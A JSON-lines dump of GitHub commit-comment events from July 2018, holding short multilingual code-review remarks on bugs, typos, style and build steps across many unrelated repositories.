{"id":"7974509536","type":"CommitCommentEvent","actor":{"login":"vecna"},"repo":{"name":"tracking-exposed/tracking-exposed"},"payload":{"comment":{"id":29730065,"position":16,"line":28,"path":"packages/service-rss/src/index.js","commit_id":"9147c43d47b8834f4d240fe63b04914a8b3cd2f7","created_at":"2018-07-17T05:57:22Z","updated_at":"2018-07-17T05:57:22Z","author_association":"MEMBER","body":"This lead to a bug, because the file on the disk is created based on this path, and now there is `https:` as subdirectory into `data/feeds`"}},"created_at":"2018-07-17T05:57:22Z"}
{"id":"7974509768","type":"CommitCommentEvent","actor":{"login":"ims21"},"repo":{"name":"E2OpenPlugins/e2openplugins"},"payload":{"comment":{"id":29730066,"position":null,"line":null,"path":null,"commit_id":"29fd31c3f10946d2c4b25c1dfe2e0cefafbfec78","created_at":"2018-07-17T05:57:27Z","updated_at":"2018-07-17T05:57:27Z","author_association":"CONTRIBUTOR","body":"python-requests, ofcourse :-)"}},"created_at":"2018-07-17T05:57:27Z"}
{"id":"7974513561","type":"CommitCommentEvent","actor":{"login":"lazka"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":29730078,"position":5,"line":54,"path":"quodlibet/quodlibet/qltk/views.py","commit_id":"4f8c38cd3c351efe1cbe160cb96aafbefd23f04f","created_at":"2018-07-17T05:58:40Z","updated_at":"2018-07-17T05:58:40Z","author_association":"MEMBER","body":"Maybe gtk_label_set_xalign() ? The widget property is handled by the parent widget afair which wont work if it fills it."}},"created_at":"2018-07-17T05:58:40Z"}
{"id":"7974516258","type":"CommitCommentEvent","actor":{"login":"bradharding"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29730081,"position":null,"line":null,"path":null,"commit_id":"d9cebae42bd50237c09c00024c239f5befa3ff9c","created_at":"2018-07-17T05:59:33Z","updated_at":"2018-07-17T05:59:33Z","author_association":"OWNER","body":"Thanks Fraggle. It was a tough decision to pull it (especially since I got pretty far with it). Maybe someone, someday will take up the reins and start a Heretic Retro fork."}},"created_at":"2018-07-17T05:59:33Z"}
{"id":"7974519363","type":"CommitCommentEvent","actor":{"login":"YoungDeeZH"},"repo":{"name":"YoungDeeZH/test-webpack"},"payload":{"comment":{"id":29730094,"position":null,"line":null,"path":null,"commit_id":"e3691139bb1f4e3de78c8ecc48878d7ae5b1dd40","created_at":"2018-07-17T06:00:31Z","updated_at":"2018-07-17T06:00:31Z","author_association":"OWNER","body":"使用自动编译代码时，可能会在保存文件时遇到一些问题。某些编辑器具有“安全写入”功能，可能会影响重新编译。\r\n- Sublime Text 3 - 在用户首选项(user preferences)中添加 `atomic_save: \"false\"`。\r\n- IntelliJ - 在首选项(preferences)中使用搜索，查找到 \"safe write\" 并且禁用它。\r\n- Vim - 在设置(settings)中增加 `:set backupcopy=yes`。\r\n- WebStorm - 在 Preferences > Appearance & Behavior > System Settings 中取消选中 Use \"safe write\"。"}},"created_at":"2018-07-17T06:00:31Z"}
{"id":"7974520357","type":"CommitCommentEvent","actor":{"login":"lazka"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":29730100,"position":5,"line":54,"path":"quodlibet/quodlibet/qltk/views.py","commit_id":"4f8c38cd3c351efe1cbe160cb96aafbefd23f04f","created_at":"2018-07-17T06:00:49Z","updated_at":"2018-07-17T06:00:49Z","author_association":"MEMBER","body":"Some tooltips (for single lines in the song list) also didn't show at all with this, so there might be more problematic changes here."}},"created_at":"2018-07-17T06:00:49Z"}
{"id":"7974521887","type":"CommitCommentEvent","actor":{"login":"YoungDeeZH"},"repo":{"name":"YoungDeeZH/test-webpack"},"payload":{"comment":{"id":29730108,"position":11,"line":10,"path":"package.json","commit_id":"e3691139bb1f4e3de78c8ecc48878d7ae5b1dd40","created_at":"2018-07-17T06:01:17Z","updated_at":"2018-07-17T06:01:17Z","author_association":"OWNER","body":"npm脚本：\r\n`npm run server `"}},"created_at":"2018-07-17T06:01:17Z"}
{"id":"7974522526","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29730111,"position":41,"line":685,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"2751eb5c67451bfe4f4bc5163101da01b20c87a0","created_at":"2018-07-17T06:01:28Z","updated_at":"2018-07-17T06:01:28Z","author_association":"COLLABORATOR","body":"diyalog maybe"}},"created_at":"2018-07-17T06:01:28Z"}
{"id":"7974522580","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29730112,"position":21,"line":54,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-17T06:01:30Z","updated_at":"2018-07-17T06:01:30Z","author_association":"CONTRIBUTOR","body":"2-1. https://github.com/parti-xyz/catan-web/blob/c11853a7096e23b3ae6842bc27d62463685f72b2/config/routes.rb#L304\r\nhttps://github.com/parti-xyz/catan-web/blob/c11853a7096e23b3ae6842bc27d62463685f72b2/app/controllers/admin/roles_controller.rb#L11\r\n요렇게 입니다 ㅋㅋ\r\n\r\n2-2. 네. 이번 사례는 destroy라는 원칙을 두고 별다른 의도 없이 같은 의미를 가진 remove라고 썼으니 destroy가 더 명확한 표현일 것 같습니다. routes 문서를 읽어보겠습니다."}},"created_at":"2018-07-17T06:01:30Z"}
{"id":"7974524333","type":"CommitCommentEvent","actor":{"login":"Kiittyka"},"repo":{"name":"internsandroid/sorting_all"},"payload":{"comment":{"id":29730117,"position":null,"line":null,"path":null,"commit_id":"88c736c21012411eddbc3e7f156114871450a20f","created_at":"2018-07-17T06:02:02Z","updated_at":"2018-07-17T06:02:02Z","author_association":"NONE","body":"Checks for valid inputs,hints error if invalid and sorts the sequence in ascending order."}},"created_at":"2018-07-17T06:02:02Z"}
{"id":"7974529223","type":"CommitCommentEvent","actor":{"login":"wesley100002001"},"repo":{"name":"watchout-tw/watchout-common-functions"},"payload":{"comment":{"id":29730130,"position":null,"line":null,"path":null,"commit_id":"5524554054fd9841862b458a9ab2b903b1d808db","created_at":"2018-07-17T06:03:36Z","updated_at":"2018-07-17T06:03:36Z","author_association":"CONTRIBUTOR","body":"覺得應該 ok，如果用 !== 會撞到如果 obj[key] 是 0 的狀況要處理 XD 直接 check 空字串還行"}},"created_at":"2018-07-17T06:03:36Z"}
{"id":"7974536073","type":"CommitCommentEvent","actor":{"login":"M-Saleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29730148,"position":null,"line":null,"path":null,"commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-17T06:05:54Z","updated_at":"2018-07-17T06:05:54Z","author_association":"COLLABORATOR","body":"Good (Y)"}},"created_at":"2018-07-17T06:05:54Z"}
{"id":"7974549676","type":"CommitCommentEvent","actor":{"login":"redbaron4"},"repo":{"name":"elastic/logstash"},"payload":{"comment":{"id":29730161,"position":55,"line":55,"path":"logstash-core/lib/logstash/plugins/builtin/pipeline/input.rb","commit_id":"ea3474566f6ff24c42291844c14871d5dfd132fb","created_at":"2018-07-17T06:10:01Z","updated_at":"2018-07-17T06:10:01Z","author_association":"NONE","body":"Setting `running` to false before shut-down of conected input/output plygins leads to shutdown stall as downstream pipeline no longer accepts events sent by upstream pipeline and upstream pipeline stalls with `Attempted to send event to 'foo' but that address was unavailable. Maybe the destination pipeline is down or stopping? Will Retry.` Please see #9818 for more info. Setting `running` to false _after_ `unlisten` shuts down the pipeline (although it does throw a null-pointer exception sometimes)."}},"created_at":"2018-07-17T06:10:01Z"}
{"id":"7974551293","type":"CommitCommentEvent","actor":{"login":"dwijnand"},"repo":{"name":"sbt/sbt-buildinfo"},"payload":{"comment":{"id":29730164,"position":30,"line":61,"path":"src/main/scala/sbtbuildinfo/package.scala","commit_id":"46d7c0938df2eaa45c459240ba6da9b98746125f","created_at":"2018-07-17T06:10:26Z","updated_at":"2018-07-17T06:10:26Z","author_association":"MEMBER","body":"Damn it. Thanks."}},"created_at":"2018-07-17T06:10:26Z"}
{"id":"7974554935","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730170,"position":6,"line":6,"path":"Lesson1/Task1.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:11:36Z","updated_at":"2018-07-17T06:11:36Z","author_association":"NONE","body":"Скобки вокруг ``` good_height < 0 ``` не нужны. У оператора ``` < ``` выше приоритет"}},"created_at":"2018-07-17T06:11:36Z"}
{"id":"7974555316","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730171,"position":6,"line":6,"path":"Lesson1/Task1.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:11:42Z","updated_at":"2018-07-17T06:11:42Z","author_association":"NONE","body":"Нужно, чтобы не было красной стрелки, которую показывает Github в конце строки.  для этого найди для своего редактора как настроить автодобавление пустой строки в конце файла."}},"created_at":"2018-07-17T06:11:42Z"}
{"id":"7974555594","type":"CommitCommentEvent","actor":{"login":"sreemo50"},"repo":{"name":"sreemo50/SampleTest"},"payload":{"comment":{"id":29730172,"position":null,"line":null,"path":null,"commit_id":"9c1984d5d1a85c2ec52d4f37de29b3b496cb720f","created_at":"2018-07-17T06:11:47Z","updated_at":"2018-07-17T06:11:47Z","author_association":"OWNER","body":"this commit needs to be changed with first line"}},"created_at":"2018-07-17T06:11:47Z"}
{"id":"7974555732","type":"CommitCommentEvent","actor":{"login":"Savelov-Vitaliy"},"repo":{"name":"Savelov-Vitaliy/test-guru"},"payload":{"comment":{"id":29730173,"position":23,"line":28,"path":"app/models/test_passage.rb","commit_id":"6db07176a4c918ead8609192dbbaeab9cc9c4f81","created_at":"2018-07-17T06:11:49Z","updated_at":"2018-07-17T06:11:49Z","author_association":"OWNER","body":"тут просто 100 заменил на 100.00 и все :)"}},"created_at":"2018-07-17T06:11:49Z"}
{"id":"7974556735","type":"CommitCommentEvent","actor":{"login":"Savelov-Vitaliy"},"repo":{"name":"Savelov-Vitaliy/test-guru"},"payload":{"comment":{"id":29730174,"position":38,"line":41,"path":"app/models/test_passage.rb","commit_id":"6db07176a4c918ead8609192dbbaeab9cc9c4f81","created_at":"2018-07-17T06:12:07Z","updated_at":"2018-07-17T06:12:07Z","author_association":"OWNER","body":"ОК! :)"}},"created_at":"2018-07-17T06:12:07Z"}
{"id":"7974568795","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730201,"position":4,"line":4,"path":"Lesson1/Task2.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:15:38Z","updated_at":"2018-07-17T06:15:38Z","author_association":"NONE","body":"Старайся сразу отвыкать от однобуквеных переменных. Они затрудняют чтение кода. А чтение кода - это то, чем мы занимаемся большую часть времени."}},"created_at":"2018-07-17T06:15:38Z"}
{"id":"7974571125","type":"CommitCommentEvent","actor":{"login":"Savelov-Vitaliy"},"repo":{"name":"Savelov-Vitaliy/test-guru"},"payload":{"comment":{"id":29730204,"position":23,"line":28,"path":"app/models/test_passage.rb","commit_id":"6db07176a4c918ead8609192dbbaeab9cc9c4f81","created_at":"2018-07-17T06:16:21Z","updated_at":"2018-07-17T06:16:21Z","author_association":"OWNER","body":"а во вьюхе с результатами добавил \".round 0\""}},"created_at":"2018-07-17T06:16:21Z"}
{"id":"7974572766","type":"CommitCommentEvent","actor":{"login":"Bunty77"},"repo":{"name":"Bunty77/Nemo-Elearning"},"payload":{"comment":{"id":29730210,"position":null,"line":null,"path":null,"commit_id":"875ec1c5974d76e021a5015b9bb9c26d904b7e47","created_at":"2018-07-17T06:16:49Z","updated_at":"2018-07-17T06:16:49Z","author_association":"OWNER","body":"i dont need this file"}},"created_at":"2018-07-17T06:16:49Z"}
{"id":"7974575606","type":"CommitCommentEvent","actor":{"login":"A12134"},"repo":{"name":"A12134/Hope"},"payload":{"comment":{"id":29730219,"position":null,"line":null,"path":null,"commit_id":"52874aec3b1c18e49d9f3f4c872314b2c9b35315","created_at":"2018-07-17T06:17:41Z","updated_at":"2018-07-17T06:17:41Z","author_association":"OWNER","body":"A simple typo caused me two weeks with no advance."}},"created_at":"2018-07-17T06:17:41Z"}
{"id":"7974577220","type":"CommitCommentEvent","actor":{"login":"hemanik"},"repo":{"name":"dipak-pawar/fabric8-auth"},"payload":{"comment":{"id":29730221,"position":36,"line":36,"path":"minishift/dev_setup.md","commit_id":"885b7727a01e029bea947668eae9d63aeb7eca2c","created_at":"2018-07-17T06:18:09Z","updated_at":"2018-07-17T06:18:09Z","author_association":"NONE","body":"Typo `required`"}},"created_at":"2018-07-17T06:18:09Z"}
{"id":"7974578309","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730224,"position":6,"line":6,"path":"Lesson1/Task2.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:18:30Z","updated_at":"2018-07-17T06:18:30Z","author_association":"NONE","body":"Давай вытащим вычисление площади в переменную и затем подставим эту переменную тут внутри интерполяции"}},"created_at":"2018-07-17T06:18:30Z"}
{"id":"7974582849","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730236,"position":6,"line":6,"path":"Lesson1/Task2.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:19:53Z","updated_at":"2018-07-17T06:19:53Z","author_association":"NONE","body":"И вокруг всех операторов (кроме оператора возведения в степень (```**```)) -  ставятся пробелы"}},"created_at":"2018-07-17T06:19:53Z"}
{"id":"7974588072","type":"CommitCommentEvent","actor":{"login":"xiaobailean"},"repo":{"name":"xiaobailean/demo"},"payload":{"comment":{"id":29730243,"position":null,"line":null,"path":null,"commit_id":"73267960a823ed221e0836e6447ee9f8f2035d6b","created_at":"2018-07-17T06:21:25Z","updated_at":"2018-07-17T06:21:25Z","author_association":"OWNER","body":"hh"}},"created_at":"2018-07-17T06:21:25Z"}
{"id":"7974590256","type":"CommitCommentEvent","actor":{"login":"qqqst10"},"repo":{"name":"qqqst10/learngit"},"payload":{"comment":{"id":29730246,"position":null,"line":null,"path":null,"commit_id":"753486513006fa3b48988bb64ea8c8f59faf6457","created_at":"2018-07-17T06:22:03Z","updated_at":"2018-07-17T06:22:03Z","author_association":"OWNER","body":"双方各是"}},"created_at":"2018-07-17T06:22:03Z"}
{"id":"7974591545","type":"CommitCommentEvent","actor":{"login":"johanns10"},"repo":{"name":"johanns10/adv_creditos"},"payload":{"comment":{"id":29730251,"position":null,"line":null,"path":null,"commit_id":"5ef9a4eccb54076bb3cc8cf045328445f3538c82","created_at":"2018-07-17T06:22:24Z","updated_at":"2018-07-17T06:22:24Z","author_association":"OWNER","body":"UP: Backend Java Spring"}},"created_at":"2018-07-17T06:22:24Z"}
{"id":"7974594979","type":"CommitCommentEvent","actor":{"login":"lmeireles"},"repo":{"name":"lmeireles/angular-movie-search"},"payload":{"comment":{"id":29730262,"position":6,"line":34,"path":"angular.json","commit_id":"7d5c8b12b052785f64890db78286f3491f70c860","created_at":"2018-07-17T06:23:20Z","updated_at":"2018-07-17T06:23:20Z","author_association":"OWNER","body":"Really important for global scss vars and mixins"}},"created_at":"2018-07-17T06:23:20Z"}
{"id":"7974595332","type":"CommitCommentEvent","actor":{"login":"hemanik"},"repo":{"name":"dipak-pawar/fabric8-auth"},"payload":{"comment":{"id":29730264,"position":146,"line":146,"path":"minishift/dev_setup.md","commit_id":"885b7727a01e029bea947668eae9d63aeb7eca2c","created_at":"2018-07-17T06:23:26Z","updated_at":"2018-07-17T06:23:26Z","author_association":"NONE","body":"Typo `binary`"}},"created_at":"2018-07-17T06:23:26Z"}
{"id":"7974595596","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29730265,"position":28,"line":161,"path":"src/dataset.py","commit_id":"bb36d84a208331e12b19cd1738b4b8108512e82e","created_at":"2018-07-17T06:23:31Z","updated_at":"2018-07-17T06:23:31Z","author_association":"MEMBER","body":"This is going to raise an error 'mean is not defined'"}},"created_at":"2018-07-17T06:23:31Z"}
{"id":"7974595827","type":"CommitCommentEvent","actor":{"login":"rikyperdana"},"repo":{"name":"rikyperdana/mithril-autoform"},"payload":{"comment":{"id":29730266,"position":null,"line":null,"path":null,"commit_id":"741d92e0c35fc5d4b48f0b4bcda020ecefdcb070","created_at":"2018-07-17T06:23:34Z","updated_at":"2018-07-17T06:23:34Z","author_association":"OWNER","body":"Because not every selectable provides value and label list"}},"created_at":"2018-07-17T06:23:34Z"}
{"id":"7974596083","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29730267,"position":29,"line":162,"path":"src/dataset.py","commit_id":"bb36d84a208331e12b19cd1738b4b8108512e82e","created_at":"2018-07-17T06:23:39Z","updated_at":"2018-07-17T06:23:39Z","author_association":"MEMBER","body":"^ same"}},"created_at":"2018-07-17T06:23:39Z"}
{"id":"7974615796","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29730306,"position":null,"line":null,"path":null,"commit_id":"6227bb9220794571b982080fb3de37128cfae718","created_at":"2018-07-17T06:29:16Z","updated_at":"2018-07-17T06:29:16Z","author_association":"MEMBER","body":"@fichtner almost but it shouldn't output IPv4 rules for these. "}},"created_at":"2018-07-17T06:29:16Z"}
{"id":"7974620217","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29730326,"position":null,"line":null,"path":null,"commit_id":"6227bb9220794571b982080fb3de37128cfae718","created_at":"2018-07-17T06:30:25Z","updated_at":"2018-07-17T06:30:25Z","author_association":"MEMBER","body":"that's because these rules have no inet / inet6 designation I think.\r\n\r\nI'm unsure if we should do it, it looks safer this way but we can do the split if you want?"}},"created_at":"2018-07-17T06:30:25Z"}
{"id":"7974624218","type":"CommitCommentEvent","actor":{"login":"Crystal19870713"},"repo":{"name":"sleepacesource/IOS_Wifi_Config"},"payload":{"comment":{"id":29730330,"position":null,"line":null,"path":null,"commit_id":"e31781a733ed1b04798f686b2e06a9b42b153cfc","created_at":"2018-07-17T06:31:25Z","updated_at":"2018-07-17T06:31:25Z","author_association":"CONTRIBUTOR","body":"install"}},"created_at":"2018-07-17T06:31:25Z"}
{"id":"7974626430","type":"CommitCommentEvent","actor":{"login":"sreemo50"},"repo":{"name":"sreemo50/SampleTest"},"payload":{"comment":{"id":29730334,"position":null,"line":null,"path":null,"commit_id":"267212f7b2d191dd6410a0be235203566914afe1","created_at":"2018-07-17T06:32:03Z","updated_at":"2018-07-17T06:32:03Z","author_association":"OWNER","body":"dfgd"}},"created_at":"2018-07-17T06:32:03Z"}
{"id":"7974627584","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730335,"position":14,"line":14,"path":"Lesson1/Task3.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:32:22Z","updated_at":"2018-07-17T06:32:22Z","author_association":"NONE","body":"Нужна проверка на то, что треугольник равносторонний. Ее лучше вытащить перед остальными вычислениями и прервать выполнение программы. Дальнейшие вычисления будут бессмысленны тк, равносторонний прямоугольник не может быть прямоугольным"}},"created_at":"2018-07-17T06:32:22Z"}
{"id":"7974628239","type":"CommitCommentEvent","actor":{"login":"Ferasalbarghouth"},"repo":{"name":"Ferasalbarghouth/product_plan"},"payload":{"comment":{"id":29730336,"position":null,"line":null,"path":null,"commit_id":"140276ccd2163888e98fe8bfaeb288232da695fe","created_at":"2018-07-17T06:32:32Z","updated_at":"2018-07-17T06:32:32Z","author_association":"OWNER","body":"بدون"}},"created_at":"2018-07-17T06:32:32Z"}
{"id":"7974630164","type":"CommitCommentEvent","actor":{"login":"jagabandhupadhy"},"repo":{"name":"jagabandhupadhy/jagabandhu"},"payload":{"comment":{"id":29730339,"position":null,"line":null,"path":null,"commit_id":"646b71f5a0914b5ad85e0c9de1a9c187214c911c","created_at":"2018-07-17T06:33:06Z","updated_at":"2018-07-17T06:33:06Z","author_association":"OWNER","body":"Travel API Client\r\nClone this repo and start it : \r\non windows systems use the gradlew.bat bootRun\r\non Unix: ./gradlew bootRun\r\nAfter starting the application go to: http://localhost:9000/travel/index.html"}},"created_at":"2018-07-17T06:33:06Z"}
{"id":"7974636456","type":"CommitCommentEvent","actor":{"login":"papampi"},"repo":{"name":"papampi/nvOC_by_fullzero_Community_Release"},"payload":{"comment":{"id":29730351,"position":null,"line":null,"path":null,"commit_id":"c296fdea446dd95eecd0f202b2649193a27949bb","created_at":"2018-07-17T06:34:53Z","updated_at":"2018-07-17T06:34:53Z","author_association":"OWNER","body":"Fix for https://github.com/papampi/nvOC_by_fullzero_Community_Release/issues/144"}},"created_at":"2018-07-17T06:34:53Z"}
{"id":"7974641177","type":"CommitCommentEvent","actor":{"login":"oncletom"},"repo":{"name":"oncletom/nodebook"},"payload":{"comment":{"id":29730357,"position":101,"line":1498,"path":"chapter-07/index.adoc","commit_id":"e40f2618d3650b66106ac28ad66f3af10e666c59","created_at":"2018-07-17T06:36:16Z","updated_at":"2018-07-17T06:36:16Z","author_association":"OWNER","body":"Bien vu, merci d'y avoir fait gaffe et désolé d'avoir écorché le nom 😅 "}},"created_at":"2018-07-17T06:36:16Z"}
{"id":"7974641708","type":"CommitCommentEvent","actor":{"login":"Hideyuki-Yamashita"},"repo":{"name":"ntt-ns/spp"},"payload":{"comment":{"id":29730362,"position":null,"line":null,"path":null,"commit_id":"bdee872db878b8d99328fba32835158e44033767","created_at":"2018-07-17T06:36:25Z","updated_at":"2018-07-17T06:36:25Z","author_association":"CONTRIBUTOR","body":"一行あたり80文字の制限を超えている部分があるので修正お願いします。"}},"created_at":"2018-07-17T06:36:25Z"}
{"id":"7974645786","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29730374,"position":null,"line":null,"path":null,"commit_id":"3a0cc670d3ea264997388ba6a1a80d8ce742bae2","created_at":"2018-07-17T06:37:31Z","updated_at":"2018-07-17T06:37:31Z","author_association":"COLLABORATOR","body":"Puzzle `781-17e9f237` disappeared from [`src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java`](https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java), that's why I closed #789. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-17T06:37:31Z"}
{"id":"7974647190","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29730375,"position":null,"line":null,"path":null,"commit_id":"915dec9f22db9ef7fc4c4ed8d668ef05656348ab","created_at":"2018-07-17T06:37:55Z","updated_at":"2018-07-17T06:37:55Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/915dec9f22db9ef7fc4c4ed8d668ef05656348ab#commitcomment-29729365) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/6a507ef04186d6476e7c1760896f908da207f47b/daily_2018_7_17/report.md). cc @ararslan"}},"created_at":"2018-07-17T06:37:55Z"}
{"id":"7974649517","type":"CommitCommentEvent","actor":{"login":"1654629290"},"repo":{"name":"1654629290/PaperCode"},"payload":{"comment":{"id":29730381,"position":20,"line":20,"path":"PaperCode/Toutiao_bTreeMirror.cpp","commit_id":"b28bf48ac6152c5021c31d1cb998b898099a1fb1","created_at":"2018-07-17T06:38:36Z","updated_at":"2018-07-17T06:38:36Z","author_association":"OWNER","body":"是按层次遍历存储节点的数组"}},"created_at":"2018-07-17T06:38:36Z"}
{"id":"7974652462","type":"CommitCommentEvent","actor":{"login":"vecna"},"repo":{"name":"tracking-exposed/tracking-exposed"},"payload":{"comment":{"id":29730385,"position":16,"line":28,"path":"packages/service-rss/src/index.js","commit_id":"9147c43d47b8834f4d240fe63b04914a8b3cd2f7","created_at":"2018-07-17T06:39:24Z","updated_at":"2018-07-17T06:39:24Z","author_association":"MEMBER","body":"FYI, I've fixed in production but now committed "}},"created_at":"2018-07-17T06:39:24Z"}
{"id":"7974654753","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730389,"position":12,"line":12,"path":"Lesson1/Task3.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:40:04Z","updated_at":"2018-07-17T06:40:04Z","author_association":"NONE","body":"Нужно стараться по возможности избегать вложенных условий. Они усложняют читаемость кода. Здесь лучше использовать elsif"}},"created_at":"2018-07-17T06:40:04Z"}
{"id":"7974656404","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29730394,"position":null,"line":null,"path":null,"commit_id":"a56ef68e275c58cb27c75cb85b04d91aca35ce62","created_at":"2018-07-17T06:40:31Z","updated_at":"2018-07-17T06:40:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Crayons](https://trello.com/c/9A6lNHFk/11-crayons)"}},"created_at":"2018-07-17T06:40:31Z"}
{"id":"7974658508","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29730396,"position":null,"line":null,"path":null,"commit_id":"9d8b9b7f5ecb534e5c03876eae47bc234096ec26","created_at":"2018-07-17T06:41:07Z","updated_at":"2018-07-17T06:41:07Z","author_association":"NONE","body":"@AndyGrant \r\nThe + operator has a higher priority than the == operator. So you should write `kingAttackersCount[Us] += 1 + (Pt == QUEEN);` to get the intended effect."}},"created_at":"2018-07-17T06:41:07Z"}
{"id":"7974662600","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730403,"position":12,"line":12,"path":"Lesson1/Task3.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:42:12Z","updated_at":"2018-07-17T06:42:12Z","author_association":"NONE","body":"Нужен пробел после if. И стоит убрать пробелы сразу после открывающей/ перед закрывающей скобками\r\nне ```( a == b )```, а ```(a == b)```"}},"created_at":"2018-07-17T06:42:12Z"}
{"id":"7974662913","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730404,"position":10,"line":10,"path":"Lesson1/Task3.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:42:17Z","updated_at":"2018-07-17T06:42:17Z","author_association":"NONE","body":"И стоит убрать пробелы сразу после открывающей/ перед закрывающей скобками\r\nне ```( a == b )```, а ```(a == b)```"}},"created_at":"2018-07-17T06:42:17Z"}
{"id":"7974663424","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29730405,"position":21,"line":54,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-17T06:42:25Z","updated_at":"2018-07-17T06:42:25Z","author_association":"CONTRIBUTOR","body":"2-1 찬찬히 읽어보시면 role 모델을 생성하고 삭제하는 action이 아닙니다. role모델을 user모델에 넣고 빼는 액션입니다. 생성삭제라면 create나 destroy를 썼겠지요."}},"created_at":"2018-07-17T06:42:25Z"}
{"id":"7974668037","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29730420,"position":null,"line":null,"path":null,"commit_id":"9d8b9b7f5ecb534e5c03876eae47bc234096ec26","created_at":"2018-07-17T06:43:46Z","updated_at":"2018-07-17T06:43:46Z","author_association":"OWNER","body":"Whoops! I imagine that would have failed VERY fast :) King safety with only Rook attacks would be interesting... \r\nSending in a new version now."}},"created_at":"2018-07-17T06:43:46Z"}
{"id":"7974669714","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"conjure-up/conjure-up"},"payload":{"comment":{"id":29730423,"position":null,"line":null,"path":null,"commit_id":"8cca36573b0700199d53198267c81c0aa62ba46d","created_at":"2018-07-17T06:44:12Z","updated_at":"2018-07-17T06:44:12Z","author_association":"NONE","body":"@battlemidget I've now shipped 2.6.0 in Homebrew! https://github.com/Homebrew/homebrew-core/pull/30135"}},"created_at":"2018-07-17T06:44:12Z"}
{"id":"7974673240","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730427,"position":10,"line":10,"path":"Lesson1/Task4.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:45:08Z","updated_at":"2018-07-17T06:45:08Z","author_association":"NONE","body":"пробел после if. Убери пробел сразу после скобки. Используй 2 пробела вместо табов"}},"created_at":"2018-07-17T06:45:08Z"}
